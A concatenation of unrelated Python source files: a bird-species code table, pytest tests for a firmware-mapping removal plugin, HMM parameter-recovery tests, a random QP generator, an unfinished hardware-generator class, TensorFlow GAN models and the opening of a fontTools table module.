'ribgul': 'Larus delawarensis_Ring-billed Gull',
'rinduc': 'Aythya collaris_Ring-necked Duck',
'robgro': 'Pheucticus ludovicianus_Rose-breasted Grosbeak',
'rocpig': 'Columba livia_Rock Pigeon',
'rocwre': 'Salpinctes obsoletus_Rock Wren',
'rthhum': 'Archilochus colubris_Ruby-throated Hummingbird',
'ruckin': 'Regulus calendula_Ruby-crowned Kinglet',
'rudduc': 'Oxyura jamaicensis_Ruddy Duck',
'rufgro': 'Bonasa umbellus_Ruffed Grouse',
'rufhum': 'Selasphorus rufus_Rufous Hummingbird',
'rusbla': 'Euphagus carolinus_Rusty Blackbird',
'sagspa1': 'Artemisiospiza nevadensis_Sagebrush Sparrow',
'sagthr': 'Oreoscoptes montanus_Sage Thrasher',
'savspa': 'Passerculus sandwichensis_Savannah Sparrow',
'saypho': "Sayornis saya_Say's Phoebe",
'scatan': 'Piranga olivacea_Scarlet Tanager',
'scoori': "Icterus parisorum_Scott's Oriole",
'semplo': 'Charadrius semipalmatus_Semipalmated Plover',
'semsan': 'Calidris pusilla_Semipalmated Sandpiper',
'sheowl': 'Asio flammeus_Short-eared Owl',
'shshaw': 'Accipiter striatus_Sharp-shinned Hawk',
'snobun': 'Plectrophenax nivalis_Snow Bunting',
'snogoo': 'Anser caerulescens_Snow Goose',
'solsan': 'Tringa solitaria_Solitary Sandpiper',
'sonspa': 'Melospiza melodia_Song Sparrow',
'sora': 'Porzana carolina_Sora',
'sposan': 'Actitis macularius_Spotted Sandpiper',
'spotow': 'Pipilo maculatus_Spotted Towhee',
'stejay': "Cyanocitta stelleri_Steller's Jay",
'swahaw': "Buteo swainsoni_Swainson's Hawk",
'swaspa': 'Melospiza georgiana_Swamp Sparrow',
'swathr': "Catharus ustulatus_Swainson's Thrush",
'treswa': 'Tachycineta bicolor_Tree Swallow',
'truswa': 'Cygnus buccinator_Trumpeter Swan',
'tuftit': 'Baeolophus bicolor_Tufted Titmouse',
'tunswa': 'Cygnus columbianus_Tundra Swan',
'veery': 'Catharus fuscescens_Veery',
'vesspa': 'Pooecetes gramineus_Vesper Sparrow',
'vigswa': 'Tachycineta thalassina_Violet-green Swallow',
'warvir': 'Vireo gilvus_Warbling Vireo',
'wesblu': 'Sialia mexicana_Western Bluebird',
'wesgre': 'Aechmophorus occidentalis_Western Grebe',
'weskin': 'Tyrannus verticalis_Western Kingbird',
'wesmea': 'Sturnella neglecta_Western Meadowlark',
'wessan': 'Calidris mauri_Western Sandpiper',
'westan': 'Piranga ludoviciana_Western Tanager',
'wewpew': 'Contopus sordidulus_Western Wood-Pewee',
'whbnut': 'Sitta carolinensis_White-breasted Nuthatch',
'whcspa': 'Zonotrichia leucophrys_White-crowned Sparrow',
'whfibi': 'Plegadis chihi_White-faced Ibis',
'whtspa': 'Zonotrichia albicollis_White-throated Sparrow',
'whtswi': 'Aeronautes saxatalis_White-throated Swift',
'wilfly': 'Empidonax traillii_Willow Flycatcher',
'wilsni1': "Gallinago delicata_Wilson's Snipe",
'wiltur': 'Meleagris gallopavo_Wild Turkey',
'winwre3': 'Troglodytes hiemalis_Winter Wren',
'wlswar': "Cardellina pusilla_Wilson's Warbler",
'wooduc': 'Aix sponsa_Wood Duck',
'wooscj2': "Aphelocoma woodhouseii_Woodhouse's Scrub-Jay",
'woothr': 'Hylocichla mustelina_Wood Thrush',
'y00475': 'Fulica americana_American Coot',
'yebfly': 'Empidonax flaviventris_Yellow-bellied Flycatcher',
'yebsap': 'Sphyrapicus varius_Yellow-bellied Sakpsucker',
'yehbla': 'Xanthocephalus xanthocephalus_Yellow-headed Blackbird',
'yelwar': 'Setophaga petechia_Yellow Warbler',
'yerwar': 'Setophaga coronata_Yellow-rumped Warbler',
'yetvir': 'Vireo flavifrons_Yellow-throated Vireo'}
# Reverse lookup: "scientific name_common name" string -> short eBird code.
INV_EBIRD_LABEL = {label: code for code, label in EBIRD_LABEL.items()}
|
1689820
|
from unittest.mock import create_autospec, ANY, patch, call
import pytest
from stack.commands import DatabaseConnection
from stack.commands.remove.host.firmware.mapping import Command
from stack.exception import CommandError
from stack.commands.remove.host.firmware.mapping.plugin_basic import Plugin
class TestRemoveHostFirmwareMappingBasicPlugin:
    """A test case for the remove host firmware mapping basic plugin.

    All collaborators (the owning Command and its DatabaseConnection) are
    autospecced mocks, so these tests exercise only the plugin's own logic.
    """

    @pytest.fixture
    def basic_plugin(self):
        """A fixture that returns the plugin instance for use in tests.

        This sets up the required mocks needed to construct the plugin class.
        """
        mock_command = create_autospec(
            spec = Command,
            instance = True,
        )
        mock_command.db = create_autospec(
            spec = DatabaseConnection,
            spec_set = True,
            instance = True,
        )
        return Plugin(command = mock_command)

    def test_provides(self, basic_plugin):
        """Ensure that provides returns 'basic'."""
        assert basic_plugin.provides() == "basic"

    def test_validate_make(self, basic_plugin):
        """Ensure the make is validated if it exists."""
        mock_make = "foo"
        basic_plugin.validate_make(make = mock_make)
        basic_plugin.owner.ensure_make_exists.assert_called_once_with(
            make = mock_make,
        )

    def test_validate_make_not_provided(self, basic_plugin):
        """Ensure the make is not validated if not provided."""
        mock_make = ""
        basic_plugin.validate_make(make = mock_make)
        basic_plugin.owner.ensure_make_exists.assert_not_called()

    def test_validate_make_error(self, basic_plugin):
        """Ensure that validation fails when the make is invalid."""
        mock_make = "foo"
        basic_plugin.owner.ensure_make_exists.side_effect = CommandError(
            cmd = basic_plugin.owner,
            msg = "Test error",
        )
        with pytest.raises(CommandError):
            basic_plugin.validate_make(make = mock_make)

    def test_validate_model(self, basic_plugin):
        """Ensure the model is validated if it exists."""
        mock_make = "foo"
        mock_model = "bar"
        basic_plugin.validate_model(make = mock_make, model = mock_model)
        basic_plugin.owner.ensure_model_exists.assert_called_once_with(
            make = mock_make,
            model = mock_model,
        )

    def test_validate_model_not_provided(self, basic_plugin):
        """Ensure the model is not validated if not provided."""
        mock_make = "foo"
        mock_model = ""
        basic_plugin.validate_model(make = mock_make, model = mock_model)
        basic_plugin.owner.ensure_model_exists.assert_not_called()

    def test_validate_model_error(self, basic_plugin):
        """Ensure that validation fails when the model is invalid."""
        mock_make = "foo"
        mock_model = "bar"
        basic_plugin.owner.ensure_model_exists.side_effect = CommandError(
            cmd = basic_plugin.owner,
            msg = "Test error",
        )
        with pytest.raises(CommandError):
            basic_plugin.validate_model(make = mock_make, model = mock_model)

    @pytest.mark.parametrize(
        "hosts, versions, make, model",
        (
            (["foo"], ["bar"], "baz", "bag"),
            (["foo"], [], "baz", "bag"),
            (["foo"], [], "baz", ""),
            (["foo"], [], "", ""),
            ([], ["bar"], "baz", "bag"),
            ([], [], "baz", "bag"),
            ([], [], "baz", ""),
            ([], [], "", ""),
        )
    )
    def test_get_firmware_mappings_to_remove(self, hosts, versions, make, model, basic_plugin):
        """Test that get_firmware_mappings_to_remove works as expected for every valid argument combination."""
        test_inputs = {
            "hosts": hosts,
            "versions": versions,
            "make": make,
            "model": model,
        }
        basic_plugin.owner.db.select.return_value = [["1"]]
        # Only truthy arguments are expected to be forwarded as SQL query parameters.
        expected_query_params = list(value for value in test_inputs.values() if value)
        assert [basic_plugin.owner.db.select.return_value[0][0]] == basic_plugin.get_firmware_mappings_to_remove(**test_inputs)
        basic_plugin.owner.db.select.assert_called_once_with(ANY, expected_query_params)

    @patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_model", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_make", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
    def test_run(
        self,
        mock_unique_everseen,
        mock_lowered,
        mock_validate_make,
        mock_validate_model,
        mock_get_firmware_mappings_to_remove,
        basic_plugin,
    ):
        """Test that run works as expected when all params and args are provided and valid."""
        mock_args = ["foo", "bar"]
        expected_hosts = tuple(mock_args)
        mock_params = {"make": "fizz", "model": "buzz", "versions": "bazz, bang"}
        expected_versions = tuple(version.strip() for version in mock_params["versions"].split(",") if version.strip())
        mock_lowered.return_value = mock_params.values()
        # The plugin calls unique_everseen twice: first for hosts, then for versions.
        mock_unique_everseen.side_effect = (
            mock_args,
            expected_versions,
        )
        basic_plugin.owner.getHosts.return_value = expected_hosts
        mock_get_firmware_mappings_to_remove.return_value = ["1", "2"]
        basic_plugin.run(args = (mock_params, mock_args))
        assert [call(mock_args), call(basic_plugin.owner.fillParams.return_value)] == mock_lowered.mock_calls
        mock_unique_everseen.assert_any_call(mock_lowered.return_value)
        # Check the generator expression passed to the second call of unique_everseen
        assert tuple(mock_unique_everseen.call_args_list[1][0][0]) == expected_versions
        basic_plugin.owner.getHosts.assert_called_once_with(args = expected_hosts)
        basic_plugin.owner.fillParams.assert_called_once_with(
            names = [
                ("make", ""),
                ("model", ""),
                ("versions", ""),
            ],
            params = mock_params,
        )
        mock_validate_make.assert_called_once_with(
            basic_plugin,
            make = mock_params["make"],
        )
        mock_validate_model.assert_called_once_with(
            basic_plugin,
            make = mock_params["make"],
            model = mock_params["model"],
        )
        basic_plugin.owner.ensure_firmwares_exist.assert_called_once_with(
            make = mock_params["make"],
            model = mock_params["model"],
            versions = expected_versions,
        )
        mock_get_firmware_mappings_to_remove.assert_called_once_with(
            basic_plugin,
            hosts = expected_hosts,
            make = mock_params["make"],
            model = mock_params["model"],
            versions = expected_versions,
        )
        basic_plugin.owner.db.execute.assert_called_once_with(
            ANY,
            (mock_get_firmware_mappings_to_remove.return_value,),
        )

    @patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_model", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_make", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
    def test_run_no_hosts_or_versions(
        self,
        mock_unique_everseen,
        mock_lowered,
        mock_validate_make,
        mock_validate_model,
        mock_get_firmware_mappings_to_remove,
        basic_plugin,
    ):
        """Test that run works as expected when hosts and versions are not provided."""
        mock_args = []
        expected_hosts = tuple(mock_args)
        mock_params = {"make": "fizz", "model": "buzz", "versions": ""}
        mock_lowered.return_value = mock_params.values()
        mock_unique_everseen.return_value = mock_args
        mock_get_firmware_mappings_to_remove.return_value = ["1", "2"]
        basic_plugin.run(args = (mock_params, mock_args))
        assert [call(mock_args), call(basic_plugin.owner.fillParams.return_value)] == mock_lowered.mock_calls
        # With no versions string, unique_everseen should only be called for the hosts.
        mock_unique_everseen.assert_called_once_with(mock_lowered.return_value)
        basic_plugin.owner.getHosts.assert_not_called()
        basic_plugin.owner.fillParams.assert_called_once_with(
            names = [
                ("make", ""),
                ("model", ""),
                ("versions", ""),
            ],
            params = mock_params,
        )
        mock_validate_make.assert_called_once_with(
            basic_plugin,
            make = mock_params["make"],
        )
        mock_validate_model.assert_called_once_with(
            basic_plugin,
            make = mock_params["make"],
            model = mock_params["model"],
        )
        basic_plugin.owner.ensure_firmwares_exist.assert_not_called()
        mock_get_firmware_mappings_to_remove.assert_called_once_with(
            basic_plugin,
            hosts = expected_hosts,
            make = mock_params["make"],
            model = mock_params["model"],
            versions = mock_params["versions"],
        )
        basic_plugin.owner.db.execute.assert_called_once_with(
            ANY,
            (mock_get_firmware_mappings_to_remove.return_value,),
        )

    @patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_model", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_make", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
    def test_run_no_mappings_to_remove(
        self,
        mock_unique_everseen,
        mock_lowered,
        mock_validate_make,
        mock_validate_model,
        mock_get_firmware_mappings_to_remove,
        basic_plugin,
    ):
        """Test that run works as expected when there are no mappings to remove."""
        mock_args = ["foo", "bar"]
        expected_hosts = tuple(mock_args)
        mock_params = {"make": "fizz", "model": "buzz", "versions": "bazz, bang"}
        expected_versions = tuple(version.strip() for version in mock_params["versions"].split(",") if version.strip())
        mock_lowered.return_value = mock_params.values()
        mock_unique_everseen.side_effect = (
            mock_args,
            expected_versions,
        )
        basic_plugin.owner.getHosts.return_value = expected_hosts
        # No matching mappings: the DB delete must be skipped.
        mock_get_firmware_mappings_to_remove.return_value = []
        basic_plugin.run(args = (mock_params, mock_args))
        assert [call(mock_args), call(basic_plugin.owner.fillParams.return_value)] == mock_lowered.mock_calls
        mock_unique_everseen.assert_any_call(mock_lowered.return_value)
        # Check the generator expression passed to the second call of unique_everseen
        assert tuple(mock_unique_everseen.call_args_list[1][0][0]) == expected_versions
        basic_plugin.owner.getHosts.assert_called_once_with(args = expected_hosts)
        basic_plugin.owner.fillParams.assert_called_once_with(
            names = [
                ("make", ""),
                ("model", ""),
                ("versions", ""),
            ],
            params = mock_params,
        )
        mock_validate_make.assert_called_once_with(
            basic_plugin,
            make = mock_params["make"],
        )
        mock_validate_model.assert_called_once_with(
            basic_plugin,
            make = mock_params["make"],
            model = mock_params["model"],
        )
        basic_plugin.owner.ensure_firmwares_exist.assert_called_once_with(
            make = mock_params["make"],
            model = mock_params["model"],
            versions = expected_versions,
        )
        mock_get_firmware_mappings_to_remove.assert_called_once_with(
            basic_plugin,
            hosts = expected_hosts,
            make = mock_params["make"],
            model = mock_params["model"],
            versions = expected_versions,
        )
        basic_plugin.owner.db.execute.assert_not_called()

    @pytest.mark.parametrize("failure_mock", ("validate_make", "validate_model", "ensure_firmwares_exist"))
    @patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_model", autospec = True)
    @patch.object(target = Plugin, attribute = "validate_make", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
    @patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
    def test_run_errors(
        self,
        mock_unique_everseen,
        mock_lowered,
        mock_validate_make,
        mock_validate_model,
        mock_get_firmware_mappings_to_remove,
        failure_mock,
        basic_plugin,
    ):
        """Test that run fails when the params or args are invalid."""
        mock_args = ["foo", "bar"]
        expected_hosts = tuple(mock_args)
        mock_params = {"make": "fizz", "model": "buzz", "versions": "bazz, bang"}
        expected_versions = tuple(version.strip() for version in mock_params["versions"].split(",") if version.strip())
        mock_lowered.return_value = mock_params.values()
        mock_unique_everseen.side_effect = (
            mock_args,
            expected_versions,
        )
        basic_plugin.owner.getHosts.return_value = expected_hosts
        # Parametrized failure injection: each validation step in turn raises.
        mock_validation_functions = {
            "validate_make": mock_validate_make,
            "validate_model": mock_validate_model,
            "ensure_firmwares_exist": basic_plugin.owner.ensure_firmwares_exist,
        }
        mock_validation_functions[failure_mock].side_effect = CommandError(
            cmd = basic_plugin.owner,
            msg = "test error",
        )
        with pytest.raises(CommandError):
            basic_plugin.run(args = (mock_params, mock_args))
        # A validation failure must never reach the DB delete.
        basic_plugin.owner.db.execute.assert_not_called()
|
1689852
|
import os
# Directory containing this configuration module.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# Repository root: one level up (kept as a '..' join, not normalized).
ROOT_DIR = os.path.join(BASE_DIR, os.pardir)
# Top-level data directory and its well-known subdirectories.
DATA_DIR = os.path.join(ROOT_DIR,'Data')
# GraspNet mesh files.
mesh_top_dir = os.path.join(DATA_DIR,'GraspNet')
# Blensor scan results.
scan_result_dir = os.path.join(DATA_DIR,'BlensorResult')
# Generated command files.
CommandFile_dir = os.path.join(DATA_DIR,'CommandFiles')
|
1689864
|
from __future__ import print_function
import unittest
from unittest import TestCase
import numpy as np
from numpy.testing import assert_, assert_raises
from numpy.testing import assert_array_equal, assert_array_almost_equal
from hmmlearn.utils import normalize
from autohmm import tm
np.seterr(all='warn')
def test_precision_prior_wrong_nb():
    """Setting a precision prior whose length disagrees with n_unique must raise."""
    with assert_raises(ValueError):
        model = tm.THMM(n_unique = 2)
        # Three prior entries for a two-state model: invalid.
        model.precision_prior_ = np.array([0.7, 0.8, 0.9])
def test_precision_prior_unique():
    """A per-unique-state precision prior is replicated across tied states."""
    model = tm.THMM(n_unique = 2, n_tied = 1)
    model.precision_prior_ = np.array([[0.7], [0.3]])
    # With one tied state each unique prior appears twice, as a (4, 1, 1) array.
    expected = np.array([0.7, 0.7, 0.3, 0.3]).reshape(4, 1, 1)
    assert_array_equal(model._precision_prior_, expected)
def fit_hmm_and_monitor_log_likelihood(h, X, n_iter=1):
    """Fit model *h* to data *X* and return an array of per-iteration log-likelihoods.

    The per-iteration monitoring loop is currently disabled (see the commented
    code below), so the model is fit once and a placeholder array of length
    *n_iter* is returned.  Fix: the placeholder is now created with np.zeros
    instead of np.empty, so callers never observe uninitialized memory.
    """
    #h.n_iter = 1 # make sure we do a single iteration at a time
    #h.init_params = '' # and don't re-init params
    h.fit(X)
    loglikelihoods = np.zeros(n_iter, dtype=float)
    #for i in range(n_iter):
    #    h.fit(X)
    #    loglikelihoods[i], _ = h.score_samples(X)
    return loglikelihoods
class PlainGaussianHMM(TestCase):
    """Parameter-recovery test for a plain (untied, univariate) Gaussian THMM."""

    def setUp(self):
        # Ground-truth parameters used to generate synthetic data.
        self.prng = np.random.RandomState(2)
        self.n_unique = 2
        self.n_components = 2
        self.startprob = np.array([0.6, 0.4])
        self.transmat = np.array([[0.7, 0.3],
                                  [0.4, 0.6]])
        self.mu = np.array([0.7, -2.0])
        self.precision = np.array([[500.],
                                   [250.]])
        self.h = tm.THMM(n_unique=self.n_unique,
                         random_state=self.prng,
                         init_params = 'stmw',
                         precision_bounds = np.array([-1e5, 1e5]))
        self.h.startprob_ = self.startprob
        self.h.transmat_ = self.transmat
        self.h.mu_ = self.mu
        self.h.precision_ = self.precision

    def test_fit(self, params='sptmw', **kwargs):
        """Sample from the true model, perturb the parameters, refit, compare."""
        h = self.h
        h.params = params
        lengths = 70000
        X, _state_sequence = h.sample(lengths, random_state=self.prng)
        # Perturb away from the truth before refitting.
        h.precision_ = np.array([[700],
                                 [150]])
        h.mu_ = np.array([2.6, 3.4])
        h.transmat_ = np.array([[0.85, 0.15],
                                [0.2, 0.8]])
        # TODO: Test more parameters, generate test cases
        trainll = fit_hmm_and_monitor_log_likelihood(h, X)
        # Check that the log-likelihood is always increasing during training.
        #diff = np.diff(trainll)
        #self.assertTrue(np.all(diff >= -1e-6),
        #                "Decreasing log-likelihood: {0}" .format(diff))
        assert_array_almost_equal(h.mu_.reshape(-1),
                                  self.mu.reshape(-1), decimal=1)
        assert_array_almost_equal(h.transmat_.reshape(-1),
                                  self.transmat.reshape(-1), decimal=1)
        # Precisions are scaled down by 100 so 1-decimal tolerance is meaningful.
        assert_array_almost_equal(h.precision_.reshape(-1)/100,
                                  self.precision.reshape(-1)/100, decimal =1)
class MultivariateGaussianHMM(TestCase):
    """Parameter-recovery test for a tied, multivariate (2-feature) Gaussian THMM."""

    def setUp(self):
        # Ground-truth parameters at the unique-state level.
        self.prng = np.random.RandomState(2)
        self.n_tied = 2
        self.n_features = 2
        self.startprob = np.array([0.6, 0.4])
        self.transmat = np.array([[0.7, 0.3], [0.4, 0.6]])
        self.mu = np.array([[4.5, -1.5],
                            [-0.7, -10.4]])
        self.precision = np.array([[[0.5, 0.15],
                                    [0.15, 0.4]],
                                   [[0.6, 0.1],
                                    [0.1, 0.35]]])
        self.h = tm.THMM(n_unique=2, n_tied =self.n_tied,
                         n_features=self.n_features,
                         random_state=self.prng,
                         precision_bounds=np.array([-1e5, 1e5]),
                         init_params = 'stmaw', params='stmapw')
        self.h.startprob_ = self.startprob
        self.h.transmat_ = self.transmat
        self.h.mu_ = self.mu
        self.h.precision_ = self.precision

    def test_fit(self, params='stmpaw', **kwargs):
        """Sample, perturb, refit, and compare against the expanded truth."""
        h = self.h
        h.params = params
        lengths = 100000
        X, _state_sequence = h.sample(lengths, random_state=self.prng)
        # Perturb
        h.precision_ = np.array([[[0.4, 0.12],
                                  [0.12, 0.45]],
                                 [[0.7, 0.2],
                                  [0.2, 0.5]]])
        h.transmat_ = np.array([[0.5, 0.5], [0.2, 0.8]])
        h.mu_ = np.array([[5.8, -0.1],
                          [-3.3, -9.6]])
        # With n_tied=2, each unique state expands into a chain of 3 states,
        # so the full 6x6 transition matrix is the expected comparison target.
        self.transmat = np.array([[0.7, 0.3, 0, 0, 0, 0],
                                  [0, 0.7, 0.3, 0, 0, 0],
                                  [0, 0, 0.7, 0.3, 0, 0],
                                  [0, 0, 0, 0.6, 0.4, 0],
                                  [0, 0, 0, 0, 0.6, 0.4],
                                  [0.4, 0, 0, 0, 0, 0.6]])
        # TODO: Test more parameters, generate test cases
        trainll = fit_hmm_and_monitor_log_likelihood(h, X)
        # Check that the log-likelihood is always increasing during training.
        #diff = np.diff(trainll)
        #self.assertTrue(np.all(diff >= -1e-6),
        #                "Decreasing log-likelihood: {0}" .format(diff))
        assert_array_almost_equal(h.transmat_.reshape(-1),
                                  self.transmat.reshape(-1), decimal=1)
        assert_array_almost_equal(h.mu_.reshape(-1),
                                  self.mu.reshape(-1), decimal=1)
        assert_array_almost_equal(h.precision_.reshape(-1),
                                  self.precision.reshape(-1), decimal=1)
class TiedGaussianHMM(TestCase):
    """Parameter-recovery test for a tied, univariate Gaussian THMM."""

    def setUp(self):
        # Ground-truth parameters at the unique-state level.
        self.prng = np.random.RandomState(42)
        self.n_tied = 2
        self.n_unique = 2
        self.startprob = np.array([0.6, 0.4])
        self.transmat = np.array([[0.7, 0.3],
                                  [0.4, 0.6]])
        self.precision = np.array([[0.5],
                                   [0.3]])
        self.mu = np.array([[0.7],
                            [-2.0]])
        self.h = tm.THMM(n_unique=self.n_unique, n_tied =self.n_tied, random_state=self.prng,
                         precision_bounds=np.array([-1e5, 1e5]), init_params = 'stmaw')
        self.h.startprob_ = self.startprob
        self.h.transmat_ = self.transmat
        self.h.mu_ = self.mu
        self.h.precision_ = self.precision

    def test_fit(self, params='stmpaw', **kwargs):
        """Sample, perturb, refit, and compare against the expanded truth."""
        h = self.h
        h.params = params
        lengths = 70000
        X, _state_sequence = h.sample(lengths, random_state=self.prng)
        # Perturb away from the truth before refitting.
        h.mu_ = np.array([[3.5],
                          [-3.9]])
        h.transmat_ = np.array([[0.9, 0.1],
                                [0.7, 0.3]])
        h.precision_ = np.array([[0.4],
                                 [0.2]])
        # With n_tied=2, each unique state expands into a chain of 3 states,
        # so the full 6x6 transition matrix is the expected comparison target.
        self.transmat = np.array([[0.7, 0.3, 0, 0, 0, 0],
                                  [0, 0.7, 0.3, 0, 0, 0],
                                  [0, 0, 0.7, 0.3, 0, 0],
                                  [0, 0, 0, 0.6, 0.4, 0],
                                  [0, 0, 0, 0, 0.6, 0.4],
                                  [0.4, 0, 0, 0, 0, 0.6]])
        # TODO: Test more parameters, generate test cases
        trainll = fit_hmm_and_monitor_log_likelihood(h, X)
        # Check that the log-likelihood is always increasing during training.
        #diff = np.diff(trainll)
        #self.assertTrue(np.all(diff >= -1e-6),
        #                "Decreasing log-likelihood: {0}" .format(diff))
        assert_array_almost_equal(h.mu_.reshape(-1),
                                  self.mu.reshape(-1), decimal=1)
        assert_array_almost_equal(h.transmat_.reshape(-1),
                                  self.transmat.reshape(-1), decimal=1)
        assert_array_almost_equal(h.precision_.reshape(-1),
                                  self.precision.reshape(-1), decimal=1)
if __name__ == '__main__':
    # Run the full test suite when this module is executed directly.
    unittest.main()
|
1689883
|
import numpy as np
import scipy.sparse as spa
import cvxpy
class RandomQPExample(object):
    '''
    Random QP example

    Builds one random quadratic program in both a plain dict ("QP format")
    and as a CVXPY problem, with n variables and m = 10*n inequality rows.
    '''
    def __init__(self, n, seed=1):
        '''
        Generate problem in QP format and CVXPY format
        '''
        # Set random seed
        np.random.seed(seed)
        m = int(n * 10)
        # Generate problem data
        self.n = int(n)
        self.m = m
        P = spa.random(n, n, density=0.15,
                       data_rvs=np.random.randn,
                       format='csc')
        # P P^T is positive semidefinite; the small ridge makes it positive definite.
        self.P = P.dot(P.T).tocsc() + 1e-02 * spa.eye(n)
        self.q = np.random.randn(n)
        self.A = spa.random(m, n, density=0.15,
                            data_rvs=np.random.randn,
                            format='csc')
        v = np.random.randn(n)  # Fictitious solution
        delta = np.random.rand(m)  # To get inequality
        # Upper bounds keep v strictly feasible; lower bounds are unbounded.
        self.u = self.A@v + delta
        self.l = - np.inf * np.ones(m)  # self.u - np.random.rand(m)
        self.qp_problem = self._generate_qp_problem()
        self.cvxpy_problem = self._generate_cvxpy_problem()

    @staticmethod
    def name():
        # Human-readable name of this example.
        return 'Random QP'

    def _generate_qp_problem(self):
        '''
        Generate QP problem as a plain dict of matrices, vectors and sizes
        '''
        problem = {}
        problem['P'] = self.P
        problem['q'] = self.q
        problem['A'] = self.A
        problem['l'] = self.l
        problem['u'] = self.u
        problem['m'] = self.A.shape[0]
        problem['n'] = self.A.shape[1]
        return problem

    def _generate_cvxpy_problem(self):
        '''
        Generate QP problem in CVXPY form (two one-sided inequality constraints)
        '''
        x_var = cvxpy.Variable(self.n)
        objective = .5 * cvxpy.quad_form(x_var, self.P) + self.q * x_var
        constraints = [self.A * x_var <= self.u, self.A * x_var >= self.l]
        problem = cvxpy.Problem(cvxpy.Minimize(objective), constraints)
        return problem

    def revert_cvxpy_solution(self):
        '''
        Get QP primal and dual variables from cvxpy solution
        '''
        variables = self.cvxpy_problem.variables()
        constraints = self.cvxpy_problem.constraints
        # primal solution
        x = variables[0].value
        # dual solution: upper-bound multiplier minus lower-bound multiplier
        y = constraints[0].dual_value - constraints[1].dual_value
        return x, y
|
1689889
|
from kratos import *
class SW_NET(Generator):
    '''
    The switching network will bring in multiple items per cycle and direct
    them to the appropriate aggregation buffer
    '''
    def __init__(self,
                 interconnect_in,
                 offsets,  # Offset between the interconnect_in ports
                 data_width,
                 memory_width,  # Will be the size of the agg buffer
                 num_aggregators,
                 num_banks,
                 stride_0):
        super().__init__("sw_net")
        # Stash constructor parameters for later generation passes.
        self.interconnect_in = interconnect_in
        self.offsets = offsets
        self.data_width = data_width
        self.memory_width = memory_width
        self.num_aggregators = num_aggregators
        self.num_banks = num_banks
        self.stride_0 = stride_0
        # PORT DEFS: begin
        self._clk = self.clock("clk")
        self._clk_en = self.input("clk_en", 1)
        self._reset = self.reset("reset")
        self._flush = self.input("flush", 1)
        self._data_in = self.input("data_in",
                                   data_width,
                                   size=interconnect_in,
                                   packed=True,
                                   explicit_array=True)  # Actually an array
        self._valid_in = self.input("valid_in", interconnect_in)
        # NOTE(review): the three statements below are bare attribute reads,
        # not port definitions — presumably placeholders for self.output(...)
        # calls that were never filled in.  They likely raise AttributeError
        # at construction time; confirm intent before using this class.
        self._data_out  # should be interconnect_in as well - basically a single stage input pipe
        self._agg_index_out  # should be the num_aggregators
        self._valid_out  # Should be the num of banks
        # Somehow get data to the output ->
        # probably with an address -> which will be 0-num_aggregators
        # Then tag it with valid or not
|
1689894
|
from codebase.models.extra_layers import leaky_relu, wndense, noise, wnconv2d, wnconv2d_transpose, scale_gradient
import tensorflow as tf
from tensorflow.contrib.framework import arg_scope
from tensorbayes.layers import dense, conv2d, conv2d_transpose, upsample, avg_pool, max_pool, batch_norm, instance_norm
from codebase.args import args
dropout = tf.layers.dropout
def discriminator(x, phase, reuse=None):
    """GAN discriminator: weight-normalized conv stack with two linear heads.

    Args:
        x: input image batch tensor.
        phase: training-phase flag controlling dropout.
        reuse: passed to tf.variable_scope for weight sharing.

    Returns:
        (d, q): d is the 1-unit real/fake logit; q is the args.Y-way class
        logit head.  Both are linear (no activation, no batch norm).
    """
    with tf.variable_scope('disc/gan', reuse=reuse):
        with arg_scope([wnconv2d, wndense], activation=leaky_relu), \
             arg_scope([noise], phase=phase):
            x = dropout(x, rate=0.2, training=phase)
            x = wnconv2d(x, 64, 3, 2)
            x = dropout(x, training=phase)
            x = wnconv2d(x, 128, 3, 2)
            x = dropout(x, training=phase)
            x = wnconv2d(x, 256, 3, 2)
            x = dropout(x, training=phase)
            x = wndense(x, 1024)
            # Two heads share the 1024-d feature vector.
            q = dense(x, args.Y, activation=None, bn=False)
            d = dense(x, 1, activation=None, bn=False)
            return d, q
def generator(x, y, phase, reuse=None):
    """GAN generator: latent vector (optionally with labels) -> image tensor.

    Args:
        x: latent noise batch tensor.
        y: optional one-hot label tensor; when given it is concatenated onto
           x for conditional generation.
        phase: training-phase flag (controls batch norm mode).
        reuse: passed to tf.variable_scope for weight sharing.

    Returns:
        Generated image tensor with tanh-squashed single-channel output.
    """
    with tf.variable_scope('gen', reuse=reuse):
        with arg_scope([dense], bn=True, phase=phase, activation=tf.nn.relu), \
             arg_scope([conv2d_transpose], bn=True, phase=phase, activation=tf.nn.relu):
            if y is not None:
                x = tf.concat([x, y], 1)
            # Project and reshape to a 4x4x512 volume, then upsample via
            # three stride-2 transposed convolutions.
            x = dense(x, 4 * 4 * 512)
            x = tf.reshape(x, [-1, 4, 4, 512])
            x = conv2d_transpose(x, 256, 5, 2)
            x = conv2d_transpose(x, 128, 5, 2)
            x = wnconv2d_transpose(x, 1, 5, 2, bn=False, activation=tf.nn.tanh, scale=True)
            return x
|
1689901
|
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.misc import sstruct
from fontTools.misc.textTools import safeEval
from . import DefaultTable
import array
import sys
# sstruct format for the fixed Gloc table header (comments after '#' are
# stripped by sstruct).  Fix: corrected the "NUmber" typo in the comment.
Gloc_header = '''
    >        # big endian
    version: 16.16F    # Table version
